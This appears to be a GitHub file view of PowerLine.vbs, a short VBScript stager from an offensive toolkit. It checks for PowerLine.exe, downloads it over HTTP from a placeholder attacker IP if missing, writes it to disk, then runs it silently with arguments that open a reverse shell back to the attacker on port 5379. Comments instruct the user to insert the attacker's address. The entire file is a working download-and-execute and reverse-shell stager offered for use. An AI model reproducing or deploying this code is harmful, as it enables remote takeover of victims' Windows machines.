-
Notifications
You must be signed in to change notification settings - Fork 9
Expand file tree
/
Copy pathPowerLine.vbs
More file actions
37 lines (37 loc) · 1.39 KB
/
PowerLine.vbs
File metadata and controls
37 lines (37 loc) · 1.39 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
if Not fso.FileExists("PowerLine.exe") Then
Dim strUrl, StrFile
' You will need to update strUrl with the attackers IP
strUrl = "http://<attackers ipaddress>/PowerLine.exe"
StrFile = "PowerLine.exe"
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1
Const HTTPREQUEST_PROXYSETTING_PROXY = 2
Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts
Err.Clear
Set http = Nothing
Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")
If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")
If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")
http.Open "GET", strURL, False
http.Send
varByteArray = http.ResponseBody
Set http = Nothing
Set fs = CreateObject("Scripting.FileSystemObject")
Set ts = fs.CreateTextFile(StrFile, True)
strData = ""
strBuffer = ""
For lngCounter = 0 to UBound(varByteArray)
ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))
Next
ts.Close
End If
Dim oShell
Set oShell = CreateObject ("Wscript.Shell")
Dim strArgs
' You will need to -hostip with the attackers IP
strArgs = "PowerLine.exe revshell ""revshell -hostip <attackers ipaddress> -port 5379"""
oShell.Run strArgs, 0, false